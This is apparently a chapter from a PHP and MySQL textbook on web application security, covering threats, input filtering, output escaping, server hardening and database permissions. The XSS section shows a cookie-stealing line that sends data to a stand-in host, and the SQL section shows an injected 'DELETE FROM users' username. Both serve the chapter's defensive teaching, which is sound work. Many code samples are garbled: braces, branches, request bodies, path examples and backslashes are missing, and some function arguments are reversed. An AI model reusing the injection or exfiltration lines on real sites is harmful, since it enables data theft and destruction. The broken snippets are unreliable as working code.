16 Web Application Security

IN THIS CHAPTER WE CONTINUE THE TASK of looking at application security, looking at the broader theme of securing our entire web application. Indeed, every single part of our web applications will need to be secured from possible misuse (accidental or intentional), and we will want to develop some strategies to developing our application that will help us stay secure.

Key topics covered in this chapter include

Image  Strategies for dealing with security

Image  Identifying the threats we face

Image  Understanding who we’re dealing with

Image  Securing your code

Image  Securing your web server and PHP

Image  Database server security

Image  Protecting the network

Image  Disaster planning

Strategies for Dealing with Security

One of the greatest features of the Internet—the openness and accessibility of all machines to each other—also turns out to be one of the biggest headaches that you as a web application author have to face. With so many computers out there, the users of some are bound to have less than noble intentions. With all this danger swirling around us, it can be intimidating to think about exposing a web application dealing with potentially confidential information such as credit card numbers, bank account information, or health records to the global network. But business must go on, and we as the authors must look beyond simply securing the e-commerce portions of our application, and develop an approach to planning for and dealing with security. The key is to find one with the appropriate balance between the need to protect ourselves and the need to actually do business and have a working application.

Start with the Right Mindset

Security is not a feature. When you are writing a web application and deciding the list of features that you want to include, security is not something that you casually include in the list and assign a developer to work on for a couple of days. It must be constantly part of the core design of the application, and it is a never-ending effort, even after the application is deployed and development has slowed, if not outright ceased.

By thinking of and planning for, right from the beginning, the various ways in which our system could be abused or through which attackers might try to compromise it, we can design our code to reduce the likelihood of these problems occurring. This also saves us having to try to retrofit everything later on when we finally do turn our attention to the problem (when we are almost certain to miss many more potential problems).

Balancing Security and Usability

One of the greatest concerns we have when designing a user system is the users’ passwords. Users will often choose passwords that are not particularly difficult to crack with software, especially when they use words readily available in dictionaries. We would like a way to reduce the risk of a user’s password being guessed and our system being compromised through this.

One possible solution is to require each user to go through four login dialogs, each with a separate password. We can also require that the user change these four passwords at least once a month and make sure they never use a password they have used in the past. This would make our system much more secure, and crackers would have to spend significantly more time getting through the login process and into the compromised system.

Unfortunately, our system would be so secure that nobody would bother to use it—at some point they would decide that it was simply not worth it. This illustrates the point that just as it is important to worry about security, it is also important to worry about how this affects usability. An easy-to-use system with little security might prove attractive to users, but will also result in a higher probability of security related problems and possible business interruptions. Similarly, a system with security that is so robust as to be borderline unusable will attract few users and also very negatively affect our business.

As web application designers, we must look for ways to improve our security without disproportionately affecting the usability of the system. As with all things related to the user interface, there are no hard and fast rules to follow, so instead we must rely on some personal judgment, usability testing, and focus groups to see how users react to our prototypes and designs.

Monitoring Security

After we finish developing our web application and deploy it to production servers for people to begin using, our job is not complete. Part of security is monitoring the system as it operates, looking at logs and other files to see how the system is performing and being used. Only by keeping a close eye on the operation of the system (or by writing and running tools to do portions of this for us), can we see whether ongoing security problems exist and find areas where we might need to spend some time developing more secure solutions.

Security is, unfortunately, an ongoing battle and, in a certain hyperbolic sense, a battle that can never be won. Constant vigilance, improvements to our system, and rapid reaction to any problems are the price to be paid for a smoothly operating web application.

Our Basic Approach

To give ourselves the most complete security solution possible for reasonable effort and time, we will describe a twofold approach to security. The first part will fall along the lines of what we have discussed thus far: how to plan for securing our application and designing features into it that will help keep it safe. Were we compulsive labelers, we might call this a top-down approach.

In contrast, we might call the second part of our security approach a bottom-up approach. In this phase we look at all the individual components in our application, such as the database server, the server itself, and the network on which it resides. We ensure that not only are our interactions with these components safe, but that the installation and configuration of these components is safe. Many products install with configurations that leave us open to attack, and we would do well to learn about these holes and plug them.

Identifying the Threats We Face

In Chapter 15, “E-commerce Security Issues,” we saw a number of security threats to our e-commerce applications. In this chapter we focus on a few of these and look at how to change our development practices with them in mind.

Access to or Modification of Sensitive Data

Part of our job as web application designers and programmers is to ensure that any data the user entrusts to us are safe, as are any data that we are given from other departments. When we expose parts of this information to users of our web application, it must be in such a way that they see only the information that they are permitted to see, and they most certainly cannot see information for other users.

If we are writing a front end for an online stock or mutual funds trading system, people who can get access to our account tables might be able to find out such information as users’ taxpayer identification numbers (Social Security Numbers, or SSN, in the USA), personal information as to what securities the users hold and how much of each, and in extreme cases, even bank account information for users.

Even the exposure of a table full of names and addresses is a serious violation of security. Customers value their privacy very highly, and a huge list of names and addresses, plus some inferred information about them (“all ten thousand of these people like to shop at online tobacco stores”) creates a potential sellable item to marketing firms that do not play by the rules.

Much worse than simple access to our data, of course, is if somebody finds a way to manipulate them. A happy bank customer might find his account a few thousand dollars richer, or customer shipping addresses might be modified, causing some happy person somewhere (presumably one of the people who changed the data) to receive a good number of packages that should have been sent elsewhere.

Loss or Destruction of Data

Every bit as bad as having unauthorized users gain access to sensitive data is if we suddenly find that some portion of our data has been deleted or destroyed. If somebody manages to destroy tables in our database, our business could face irrecoverable consequences. If we are an online bank that displays bank account information, and somehow all the information for a particular account is lost, we are not a good bank. Much worse, if the entire table of users is deleted, we will find ourselves spending a large amount of time reconstructing databases and finding out who owns what.

It is important to note that loss or destruction of data does not have to come from malicious or accidental misuse of our system. If the building in which our servers are housed burns down, and all the servers and hard disks with it, we have lost a large amount of data and had better hope that we have adequate backups and disaster recovery plans.

Denial of Service

We have previously talked about denial of service attacks (DoS) and their more serious cousins, distributed denial of service attacks (DDos) as potentially devastating attacks on our application’s availability. Having your servers rendered useless for hours, if not longer, can be a serious burden from which to recover. If you consider how ubiquitous many of the major sites on the Internet are and how you always expect them to be there, any downtime is a problem.

Again, as in the previous section, a DoS can come from forces other than misuse. Even if we have robust backups stored off-site, if the building with our servers in it burns down, is buried in a mudslide, or is destroyed by alien invaders, and we do not have a plan for getting those computers back online extremely rapidly, we might find ourselves losing customers for days.

Malicious Code Injection

One type of attack that has been particularly effective via the Web is what we might call malicious code injection. The most famous of these is the Cross Site Scripting (known as XSS, so as not to be confused with Cascading Style Sheets—CSS) attack. What is particularly troubling about these attacks is that no obvious or immediate loss of data occurs, but instead some sort of code executes, causing varying degrees of information loss or redirection of users, possibly without their even noticing it.

Cross Site Scripting basically works as follows:

1.  The malicious user, in a form that will then turn around and display to other people the input it was given (such as a comment entry form or message board entry form), enters text that not only represents the message they want to enter, but some script to execute on the client, such as the following:

        this.document = "go.somewhere.bad?cookie=" + this.cookie;

2.  The malicious user then submits the form and waits.

3.  The next user of the system who goes to view the page that contains that text entered by the malicious user will execute the script code that was entered. In our simple example, the user will be redirected, along with any cookie information from the originating site.

Although this is a trivial example, client-side scripting is a very powerful language, and the possibilities for what exactly this attack could do are frightening.

Compromised Server

Although the effects of a compromised server can include the effects of many of the threats previously listed, it is still worth noting that sometimes the goal of invaders will be to gain access to our system, most often as a super user (administrator on Windows-based systems and root on Unix-like systems). With this, they have nearly free reign over the compromised computer and can execute any program they want, shut the computer off, or install software that does things we likely would not appreciate.

We want to be particularly vigilant against this type of attack because one of the first things attackers are likely to do after they have compromised a server is to cover their tracks and hide all the evidence.

Understanding Who We’re Dealing With

Although we might instinctively classify all those who cause security problems as bad or malicious people intent on causing us harm, there are often other actors in this arena who are unwitting participants and might not appreciate being called such.


The most obvious and famous group are what we will call crackers. We will resist the urge to call them hackers, because this is annoying to real hackers, most of whom are perfectly honest and well-intentioned programmers. Crackers attempt, under all sorts of motivations, to find weaknesses and work their way past these to achieve their goals. They can be driven by greed, if they are after financial information or credit card numbers; by money, if they are being paid by a competing firm to get information from your systems; or they can simply be talented individuals looking for the thrill of breaking into yet another system. Although they present a serious threat to us, it is a mistake to focus all our efforts on them.

Unwitting Users of Infected Machines

In addition to crackers, we might have to worry about a large number of other people. With all the weaknesses and security flaws in many pieces of modern software, an alarming percentage of computers are infected with software that performs all sorts of tasks. Some users of your internal corporate network might have some of this software on their machines and that software might be attacking your server without users even realizing it.

Disgruntled Employees

Company employees constitute another group you might have to worry about. These employees, for some reason or another, are intent on causing harm to the company for which they work. Whatever the motivation, they might attempt to become amateur hackers themselves, or acquire tools from external sources by which they can probe and attack servers from inside the corporate network. If we secure ourselves well from the outside world, but leave ourselves completely exposed internally, we are not secure. This is a good argument for implementing what is known as a demilitarized zone (DMZ), which we will cover later in this chapter.

Hardware Thieves

A security threat you might not think to protect yourself against is somebody simply walking into the server room, unplugging a piece of equipment, and walking out of the building with it. You might find yourself surprised at how easy it is to walk into a great many corporate offices and just stroll around without anybody suspecting anything. Somebody walking into the right room at the right time might find themselves with a shiny new server, along with hard disks full of sensitive data.


As unpleasant as it may be to hear, one of the biggest headaches we might have for the security of our systems is ourselves and the code we write. If we do not pay attention to security, if we write sloppy code and do not spend any attention on testing and verifying the security of our system, we have given malicious users a huge helping hand in their attempts to compromise our system.

If you are going to do it, do it properly. The Internet is particularly unforgiving to those prone to carelessness or laziness. The hardest part of sticking to this mantra is convincing a boss or paycheck signer that this is worthwhile. A few minutes teaching them about the negative effects (including those against the bottom line) of security lapses should be enough to convince them that the extra effort will be worthwhile in a world where reputation is everything.

Securing Your Code

Moving on to the next aspect of our approach to security—inspecting each of the components individually and looking at how to improve their security—we begin in this section by investigating the things we can do to help keep our code safe. Although we cannot show you everything you might want to do to cover all possible security threats (entire tomes have been devoted to these subjects), we can at least give some general guidelines and point you in the right direction. For some specific technology areas in PHP that we will use in later chapters, we will point out security concerns for these as we see them.

Filtering User Input

One of the most important things we can do in our web applications to make them more secure is to filter all user input.

Application authors must filter all input that comes from external sources. This does not mean that we should design a system with the assumption that all our users are crooks. We still want them to feel welcome and indeed encourage them to use our web application. We just want to be sure that we are prepared at any point for misuse of our system.

If we do this filtering effectively, we can reduce the number of external threats substantially, and massively improve the robustness of our system. Even if we are pretty sure that we trust the users, we cannot be certain that they do not have some type of spyware program or other such thing that is modifying or sending new requests to our server.

Given the importance of filtering the input we get from external customers, we should take a look at the ways in which we might do this.

Double-Checking Expected Values

At times we will present the user with a range of possible values from which to choose, for things such as shipping (ground, express, overnight), state or province, and so on. Now, imagine if we were to have the following simple form:

  <title> What be ye laddie? </title>
  <form action="submit_form.php" method="POST">
    <input type="radio" name="gender" value="Male"/>Male<br/>
    <input type="radio" name="gender" value="Female">Female<br/>
    <input type="radio" name="gender" value="Other"/>None of your Business<br/>
    <input type="submit" value="submit"/>

This form could look as shown in Figure 16.1. Given this form, we might assume that whenever we query the value of $_POST['gender'] in submit_form.php, we are going to get one of the values 'Male', 'Female', or 'Other'—and we would be completely wrong.

Figure 16.1  A trivial little gender entry form.


As we mentioned previously, the Web operates using HTTP, a simple text protocol. The preceding form submission would be sent to our server as a text message with a structure similar to the following:

POST /gender.php HTTP/1.1
Host: www.yourhostname.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:
Gecko/2008070208 Firefox/3.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

However, there is absolutely nothing stopping somebody from connecting to our web server and sending whatever values they want for a form. Thus, somebody can send us the following:

POST /gender.php HTTP/1.1
Host: www.yourhostname.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:
Gecko/2008070208 Firefox/3.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

If we were to then write the following code:

echo "<p align="center">
      The user’s gender is: ".$_POST['gender']. ".

We might find ourselves somewhat confused later on. A much better strategy is to actually verify that the incoming value is actually one of the expected/permitted values, as follows:

switch (($_POST['gender']) {
   case 'Male':
   case 'Female':
   case 'Other':

      echo "<p align="center">Congratulations!
           You are: ".$_POST['gender']. ".</p>";

      echo "<p align="center">
           <span style="color: red;">WARNING:</span>
           Invalid input value for gender specified.</p>";

There is a little bit more code involved here, but we can at least be sure we are getting correct values, and this becomes a lot more important when we start handling data values more financially sensitive than a user’s gender. As a rule, we cannot ever assume that a value from a form will be within a set of expected values—we must check first.

Filtering Even Basic Values

HTML form elements have no types associated with them and most simply pass strings (which may, in turn, represent things such as dates, times, or numbers) to the server. Thus, if you have a numeric field, you cannot assume or trust that it was truly entered as such. Even in environments where particularly powerful client-side code can try to make sure that the value entered is of a particular type, there is no guarantee that the values will not be sent to the server directly, as we saw in the previous section.

An easy way to make sure that a value is of the expected type is to cast or convert it to that type and then use that value, as follows:

  $number_of_nights = (int)$_POST['num_nights'];
  if ($number_of_nights == 0)
    echo "ERROR: Invalid number of nights for the room!";

If we have the user input a date in some localized format, such as mm/dd/yy for users in the United States, we can then write some code to make sure it is a real date using the PHP function called checkdate. This function takes a month, day, and year value (4-digit years), and indicates whether they, combined, form a valid date:

   // split is mbcs-safe via mbstring (see chapter 5)
   $mmddyy = split($_POST['departure_date'], '/'),
   if (count($mmddyy) != 3)
      echo "ERROR: Invalid Date specified!";
   // handle years like 02 or 95
   if ((int)$mmddyy[2] < 100)
      if ((int)$mmddyy[2] > 50)
         $mmddyy[2] = (int)$mmddyy[2] + 1900;
      else if ((int)$mmddyy[2] >= 0)
         $mmddyy[2] = (int)$mmddyy[2] + 2000;
      // else it’s < 0 and checkdate will catch it

   if (!checkdate($mmddyy[0], $mmddyy[1], $mmddyy[2]))
      echo "ERROR: Invalid Date specified!";

By taking the time to filter and validate the input, we can not only help ourselves out for natural error-checking that we should be doing in the first place (such as verifying whether a departure date for a plane ticket is a valid date), but we can also help improve the security of our system.

Making Strings Safe for SQL

One other case where we want to process our strings to make them safe is to prevent SQL injection attacks, which were mentioned when first looking at using MySQL in PHP. In these attacks, the malicious user tries to take advantage of poorly protected code and user permissions to execute extra SQL code that we do not necessarily want them to. If we are not careful, a username of

   kitty_cat; DELETE FROM users;

could become quite a problem for us.

You can use two primary ways to prevent this sort of security breach:

Image  Filter and escape all strings sent to database servers via SQL. Use the mysql_escape_string, mysqli::real_escape_string or mysqli_real_escape_string functions.

Image  Make sure that all input conforms to what you expect it to be. If our usernames are supposed to be up to 50 characters long and include only letters and numbers, we can be sure that "; DELETE FROM users" at the end of it is probably something we would not want to permit. Writing the PHP code to make sure input conforms to the appropriate possible values before we even send it to the database server means we can print out a much more meaningful error than the database would give us (were it checking such things), and reduce our risks.

The mysqli extension has the added security advantage of allowing only a single query to execute with the mysqli_query or mysqli::query methods. To execute multiple queries, you have to use the mysqli_multi_query or mysqli::multi_query methods, which helps us prevent the execution of additional potentially harmful statements or queries.

Escaping Output

Of nearly equal importance to filtering our input is what we’ll call escaping our output. After we have user values in our system, it is critical that we be sure that these cannot do any damage or cause any unintended consequences. We do this by using a couple of key functions to ensure that values cannot be mistaken by the client web browser for anything other than display text.

There are those applications where you might take the input that a user has specified and then display that input on a page. Pages where users can comment on a published article or message board systems are perfect examples of where this might occur. In these situations, we need to be careful that users do not inject malicious HMTL markup into the text that they input.

One of the easiest ways to do this is to use the htmlspecialchars function or the htmlentities function. These functions take certain characters they see in the input string and convert them to HTML entities. In short, an HTML entity is a special character sequence, begun with the ampersand character ( & ), used to indicate some special character that cannot easily be represented in HTML code. After the ampersand character comes the entity name and then a terminating semicolon ( ; ). Optionally, an entity can be an ASCII key code specified by # and a decimal number, such as &#47; for the forward slash character ( / ).

For example, because all markup elements in HTML are demarcated by < and > characters, it could prove difficult to enter them in a string for output to the final content (because the browser will default to assuming they delineate markup elements). To get around this, we use the entities &lt; and &gt;. Similarly, if we want to include the ampersand character in our HTML, we can use the entity &amp;. Single and double quotes are represented by &#39; and &quot; respectively. Entities are converted into output by the HTML client (web browser) and are thus not considered part of the markup.

The difference between htmlspecialchars and htmlentities is as follows: The former defaults to only replacing &, <, and >, with optional switches for single and double quotes. The latter, on the other hand, replaces anything that can be represented by a named entity with such. Examples of such entities are the copyright symbol ©, represented by &copy;, and the Euro currency symbol , represented by &euro;. It will not convert characters to numeric entities, however.

Both functions take as their second parameter a value to control whether to convert single and double quotes to entities, and both functions also take as their third parameter the character set in which the input string is encoded (which is vital for us, because we want this function to be safe on our UTF-8 strings). Possible values for the second parameter are the following:

Image  ENT_COMPAT—Double quotes are converted to &quot; but single quotes are left untouched.

Image  ENT_QUOTES—Both single and double quotes are converted, to &#39; and &quot; respectively.

Image  ENT_NOQUOTES (the default value)—Neither single nor double quotes are converted by this function.

Consider the following text:

$input_str = "<p align="center">The user gave us "15000?".</p>

              <script type="text/javascript">
              // malicious JavaScript code goes here.

If we run it through the following PHP script (we run the nl2br function on the output string strictly to ensure that it is formatted nicely in the browser):

   $str = htmlspecialchars($input_str, ENT_NOQUOTES, "UTF-8");
   echo nl2br($str);
   $str = htmlentities($input_str, ENT_QUOTES, "UTF-8");
   echo nl2br($str);

We would see the following text output:

&lt;p align="center"&gt;The user gave us "15000?".&lt;/p&gt;<br />
<br />
&lt;script type="text/javascript"&gt;<br />
// malicious JavaScript code goes here.<br />
&lt;/script&gt;&lt;p align=&quot;center&quot;&gt;The user gave us &quot;15000&euro;&quot;.&lt;/p&gt;<br />
<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
// malicious JavaScript code goes here.<br />

And it would look as follows in the browser:

<p align="center">The user gave us "15000?".</p>
<script type="text/javascript">
// malicious JavaScript code goes here.
</script><p align="center">The user gave us "15000?".</p>
<script type="text/javascript">
// malicious JavaScript code goes here.

Note that the htmlentities function replaced the symbol for the Euro currency symbol ( ) with an entity (&euro;), whereas htmlspecialchars left it alone.

For those situations where we would like to permit users to enter some HTML, such as a message board where people might like to use characters to control font, color, and style (bold or italicized), we will have to actually pick our way through the strings to find those and not strip them out.

Code Organization

There are those who would argue that any file that is not directly accessible to the user from the Internet should not find a place in the document root of the website. For example, if the document root for our message board website is /home/httpd/messageboard/www, we should place all our include files and any other files we write for the site in some place such as /home/httpd/messageboard/code. Then, in our code, when we want to include those files, we can write:


The reasons for this degree of caution come down to what happens when a malicious user makes a request for a file that is not a .php or .html file. Many web servers will default to dumping the contents of that file to the output stream. Thus, if we were to keep user_object.php somewhere in the public document root, and the user were to request it, the user might see a full dump of our code in the web browser. This would let the user see the implementation, get at any intellectual property we might have in this file, and potentially find exploits that we might have missed.

To fix this, we should be sure that the web server is configured to only allow the request of .php and .html files and that requests for other types of files should return an error from the server.

Similarly, any other files, such as password files, text files, configuration files, or special directories, are likely best kept away from the public document root. Even if we think we have our web server configured properly, we might have missed something, or if, in the future, our web application is moved to a new server that is not properly configured, we might be exposed to exploitation.

If we have allow_url_fopen enabled in our php.ini, then we could theoretically include or require files from remote servers. This would be another possible point of security failure in our application, and we would do well to avoid including files from separate machines, especially those over which we do not have full control. We should likewise not use user input when choosing which files to include or require, as bad input here could also cause problems.

What Goes in Your Code

Many of the code snippets we have shown thus far for accessing databases have included in the code the database name, username, and user password in plain text, as follows:

   $conn = @new mysqli("localhost", "bob", "secret", "somedb");

Although this is convenient, it is slightly insecure in that if crackers were to get their hands on our .php file, they would have immediate access to our database with the full permissions that the user bob has.

Better would be to put the username and password in a file that is not in the document root of the web application, and include it in our script, as follows:

  // this is dbconnect.php
  $db_server = 'localhost';
  $db_user_name = 'bob';
  $db_password = 'secret';
  $db_name = 'somedb';
    $conn = @new mysqli($db_server, $db_user_name, $db_password,
    // etc

We should think about doing the same thing for other similarly sensitive data for which we might want an additional layer of protection.

File System Considerations

PHP was designed with the capability to work with the local file system in mind. There are two concerns for us:

Image  Are any files we write to the disk going to be visible by others?

Image  If we expose this functionality to others, are they going to be able to access files we might not want them to access, such as /etc/passwd?

We will have to be careful to not write files with wide open security permissions, or place them in a location whether other users of a multiuser operating system, such as the various flavors of UNIX, could get access to them.

Additionally, we want to be extremely careful when we let users enter the name of a file they would like to see. If we had a directory in our document root (c:Program FilesApache Software FoundationApache2.2.htdocs) with a bunch of files we were granting users access to, and they input the name of the file they wanted to view, we could get into trouble if they asked to see


This would let them learn about our PHP installation and see whether any obvious weaknesses exist to exploit. Again, the fix to this problem is easy: if we do accept user input, make sure we filter it aggressively so as to avoid any problems of these sorts. For the preceding example, removing any instances of .. would certainly help prevent this problem, as would any attempt at an absolute path such as c:mysqlmy.ini.

Code Stability and Bugs

We mentioned this briefly before, but your web application is neither likely to perform well nor be terribly secure if the code has not been properly tested, reviewed, or is so complicated as to be full of bugs. This should not be taken as an accusation at all, but rather as an admission that all of us as programmers are fallible, as is the code we write.

When a user connects to a website, enters a word in the search dialog (for example, “defenestration”), and clicks Search, the user is not going to have great confidence in the robustness or security of it if the next thing the user sees is

  ¡Aiee! This should never happen. BUG BUG BUG !!!!

If we plan from the beginning for the stability of our application, we can effectively reduce the likelihood of problems due to human error. Ways in which we can do this are as follows:

Image  Complete a thorough design phase of our product, possibly with prototypes. The more people we have reviewing what we plan to do, the more likely we are to spot problems even before we begin. This is also a great time to do usability testing on our interface.

Image  Allocate testing resources to our project. So many projects skimp on this, or hire perhaps one tester for a project with 50 developers. Developers do not typically make good testers! They are very good at making sure their code works with the correct input, but less proficient at finding other problems. Major software companies have a ratio of developers to testers of nearly 1:1, and although it may not be likely that our bosses would pay for that many testers, some testing resources will be critical to the success of the application.

Image  Have your developers use some sort of testing methodology. This might not help us find all the bugs that a tester would, but this will definitely help the product from regressing—a phenomenon in which problems or bugs that were fixed some time ago are reintroduced because of other code changes. Developers should not be allowed to commit recent changes to the project unless all the unit tests continue to succeed.

Image  Monitor the application as it runs after it is deployed. By browsing regularly through the logs, looking at user/customer comments, you should be able to see if any major problems or possible security holes are cropping up. If so, you can act to address them before they become more serious.

Execution Quotes and exec

We briefly mentioned a feature previously called the shell command executor or execution quotes. This is basically a language operator via which you can execute arbitrary commands in a command shell (some flavor of sh under UNIX-like operating systems or cmd.exe under Windows) by enclosing the command in back quotes (`)—notice that they are different from regular single quotes ('). The key is typically located in the upper-left of English-language keyboards and can be quite challenging to find on other keyboard layouts.

Execution quotes return a string value with the text output of the program executed.

If we had a text file with a list of names and phone numbers in it, we might use the grep command to find a list of names that contain “Smith” .grep is a UNIX-like command that takes a string pattern to look for and list of files in which to find it. It turns those lines in those files that match the pattern to find.

   grep [args] pattern files-to-search

There are Windows versions of grep, and Windows does in fact ship with a program called findstr.exe, which can be used similarly. To find people named “Smith”, we could execute the following:

   // -i means ignore case
   $users = `grep -i smith /home/httpd/www/phonenums.txt`;
   // split the output lines into an array
   // note that the should be on Windows!
   $lines = split($users, " ");
   foreach ($lines as $line)
      // names and phone nums are separated by , char
      $namenum = split($lines, ','),
      echo "Name: {$namenum[0]}, Phone #: {$namenum[1]}<br/> ";

If you ever allow user input to the command placed in back quotes, you are opening yourselves to all sorts of security problems and will need to filter the input heavily to ensure the safety of your system. At the very least, the escapeshellcmd function should be used. To be certain, however, you might want to restrict the possible input even more.

Even worse, given that we normally want to run our web server and PHP in a context with lower permissions (we will see more about this in following sections), we might find ourselves having to grant it more permissions to execute some of these commands, which could further compromise our security. Use of this operator in a production environment is something to be approached with a great amount of caution.

The exec and system functions are very similar to the execution quotes operator, except that they execute the command directly instead of executing it within a shell environment and do not always return the full set of output that the execution quotes return. They do share many of the same security concerns, and thus also come with the same warnings.

Securing Your Web Server and PHP

In addition to worrying about code security, the installation and configuration of our web server with PHP is also a large security concern. Much software that we install on our computers and servers comes with configuration files and default feature sets designed to show off the power and usefulness of the software. It assumes that we will work on disabling those portions that are not needed and/or that are less secure than may be needed. Tragically, many people do not think to do this, or do not take the time to do it properly.

As part of our approach to dealing with security “holistically,” we want to be sure that our web servers and PHP are indeed properly configured. Although we cannot give a full presentation of how to secure each and every web server or extension in PHP you might use, we can at least provide some key points to investigate and point you in the correct direction for more advice and suggestions.

Keep Software Up-to-Date

One of the easiest ways to help the security of your system is to ensure that you are always running the latest and most secure version of the software you are using. For PHP, the Apache HTTP Server, and Microsoft’s Internet Information Server (IIS), this means going to the appropriate website (http://www.php.net, httpd.apache.org, or www.microsoft.com/iis) on a semiregular basis and looking for security advisories, new releases, and browsing through the list of new features to see if any are indeed security-related bug fixes.

Setting Up the New Version

Configuration and installation of some of these software programs can be time consuming and require a good number of steps. Especially on the UNIX versions where you install from sources, there can be a number of other pieces of software you have to install first, and then a good number of command-line switches required to get all the right modules and extensions enabled.

This is important: Make yourself a little installation “script” you follow whenever you install a newer version of the software. That way you can be sure you do not forget something important, which will only cause troubles later on. The number of steps is typically such that it is highly unlikely that our brains will remember every exact detail each time we run through an installation.

Deploying the New Version

Installations should never be done directly on the production server for the first time. You should always have a practice or test server to which you can install the software and web application and make sure everything still works. Especially for a language engine such as PHP, where some of the default settings change between versions, you will absolutely want to run through a series of test suites and practice runs before you can be sure that the new version of the software does not adversely affect your application.

Note that you do not necessarily need to go out and spend thousands of dollars on a new machine to practice the setup and configuration. Many programs that allow you to run an operating system within yours, such as VMware, Inc.’s VMware or Microsoft’s VirtualPC software, will let you do this within the current operating system you are running.

After you have verified that the new version of the software works well with your web application, you can deploy it to production servers. Here you should be absolutely sure that the process is either automated or again scripted on paper (or disk) so that you can follow an exact sequence of steps to replicate the correct server environment. Some final testing should be done on the live server to make sure that everything has, indeed, gone as expected (see Figure 16.2).

Figure 16.2  The process of upgrading server software.


Browse the php.ini file

If you have not yet spent much time browsing through the php.ini, now is a good time to load it into a text editor and look through its contents. Most of the entries in the files have adequate comments above them describing their use. They are also organized by feature area/extension name; all mbstring configuration options have names starting with mbstring, whereas those pertaining to sessions (Chapter 23, “Using Session Control in PHP”) have session prefixed.

There are a large number of configuration options for modules that we do not ever use, and if those modules are disabled, we do not have to worry about the options—they will be ignored. For those modules we do use, however, it is important to look through the documentation in the PHP Online manual (http://www.php.net/manual) to see what options that extension offers and what the possible values are.

Again, it is highly recommended that we either make regular backups of our php.ini file or write down what changes we have made so that when we install new versions, we can be sure that the correct settings are still there.

The only trick to these settings it that if you choose to use legacy software written in PHP, it may very well require that register_globals and/or register_long_arrays be turned on. In this case, you must decide whether using the software is worth the security risk. You can mitigate this risk by checking frequently for security patches and other updates for such software.

Web Server Configuration

After we are comfortable with the way we have configured the PHP language engine, we look next at the web server. Each server tends to have its own security configuration process, and we list those for the most popular two servers: Apache HTTP Server and Microsoft IIS.

Apache HTTP Server

The httpd server tends to come with a reasonably secure default installation, but there are a few things we will want to double-check before running it in a production environment. The configuration options all go in a file called httpd.conf, which tends to be in the /conf subdirectory of the base installation of httpd (that is, /usr/local/apache/conf or C:Program FilesApache Software FoundationApache2.2conf). You should definitely make sure that you have read the appropriate security sections in the online documentation for the server (http://httpd.apache.org/docs-project).

In addition, you should do the following:

Image  Make sure that httpd runs as a user without super-user privileges (such as nobody or httpd on UNIX). This is controlled by the User and Group settings in httpd.conf.

Image  Make sure that the file permissions on the Apache installation directory are set correctly. On UNIX, this involves making sure that all the directories except for the document root (which defaults to using the htdocs/ subdirectory) are owned by root and have permissions of 755.

Image  Make sure the server is set up to handle the correct number of connections. For users of the 1.3.x versions of httpd, you will want to set the value of MaxClients to some reasonable number of clients that can be processed at one time (the default value of 150 is reasonable, but if you expect a higher load, you may want to increase it). For Apache 2.x versions, where there is multithreading, you will want to check the value of ThreadsPerChild (the default of 50 is reasonable).

Image  Hide files that you do not want seen by including appropriate directives in httpd.conf. For example, to exclude .inc files from being seen, you could add the following:

     <Files ~ ".inc$">
       Order allow, deny
       Deny from all

Of course, as mentioned previously, we will want to move these files out of the document root for the specified website outright.

Microsoft IIS

Configuring IIS does not revolve around settings files as much as the Apache HTTP Server does, but there are still a number of things we should do to help secure our IIS installation:

Image  Avoid having websites reside on the same drive as the operating system.

Image  Use the NTFS file system and spend the time to remove write permissions from appropriate locations.

Image  Delete all the files that are installed by IIS into the document root by default. Chances are you will not use a vast majority of these files (if not all of them). Large amounts of content are installed in the inetpub directory, which, if you do not use the online configuration tools (and you should not—use the iisadmin utility instead), you will not need.

Image  Avoid using common names. Large numbers of automated programs out there look for scripts and programs in obvious subdirectories of our document root, such as Scripts/, cgi-bin/, bin/, and so on.

Again, reading the documentation for IIS to learn more about recommended security procedures is highly recommended.

Commercially Hosted Web Applications

There is one group of users for whom the problem of security on virtual servers is a bit more problematic—those users running their web applications on a commercial PHP/MySQL hosting service. On these servers, you likely will not have access to php.ini, and you will not be able to set all the options you would like. In extreme cases, some services will not even allow you to create directories outside of your document root directory, depriving us of a safe place to put our include files. Fortunately, most of these companies want to remain in business, and having an insecure design is not a good way to keep customers.

To be certain, you can and should do a number of things as you look into a service and deploy your web applications with them:

Image  Before you even select the service, look through their support listings. Better services will have complete online documentation (we even found a few with excellent dynamic tutorials) that show you exactly how your private space is configured. You can get a feel for what restrictions and support you will have by browsing through these.

Image  Look for hosting services that give you entire directory trees, not just a document root. Although some will state that the root directory of your private space is the document root, others will give you a complete directory hierarchy, where public_html/ is where you place your content and executable PHP scripts. On these, you could safely create an includes/ directory. This will help us ensure that people cannot see the contents of our .inc files.

Image  Try to find out what values they have used in php.ini. Although many will probably not print these on a web page or email you the file, you can ask their support personnel questions such as whether safe mode is turned on, and which functions and classes are disabled. You can also use the ini_get function to see setting values. Sites not using safe mode or without any functions at all disabled will worry us more than those with some reasonable sounding configuration.

Image  Look at what versions of the various pieces of software they are running. Are they the most recent ones? If you cannot see the output of something such as phpinfo, use a service such as Netcraft (http://www.netcraft.com), which will tell you which software a particular site is running. Make sure that they are indeed running PHP5!

Image  Look for services that offer trial periods, money-back guarantees, or some other way of seeing firsthand how your web applications will run before committing to using them for a longer period of time.

Database Server Security

In addition to keeping all of our software up-to-date, we can do a few things to keep our databases more secure as well. Again, although a complete treatment of security would require a full book for each of the database servers against which we might write our web applications, we will give some general strategies here to which we should all pay attention.

Users and the Permissions System

Spend the time to get to know the authentication and permissions system of the database server that you have chosen to use. A surprising number of database attacks succeed simply because people have not taken the time to make sure this system is secure.

Make sure that all accounts have passwords. One of the first things you do with any database server is make sure that the database super user (root) has a password. Ensure that these passwords do not contain words that are from the dictionary. Even passwords such as 44horseA are much less secure than passwords like FI93!!xl2@. For those worried about the ease with which passwords can be memorized, consider using the first letter of all the words in a particular sentence, with some pattern of capitalization, such as IwTbOtIwTwOt, from “It was the best of times, it was the worst of times” (A Tale of Two Cities, by Charles Dickens).

Many databases (including older versions of MySQL) will be installed with an anonymous user with more privileges than you would probably like. While investigating and becoming comfortable with the permissions system, make sure that any default accounts do exactly what you want them to do, and remove those that do not.

Make sure that only the super-user account has access to the permissions tables and administrative databases. Other accounts should have only permissions to access or modify strictly those databases or tables they need.

To test it out, try the following, and verify that an error occurs:

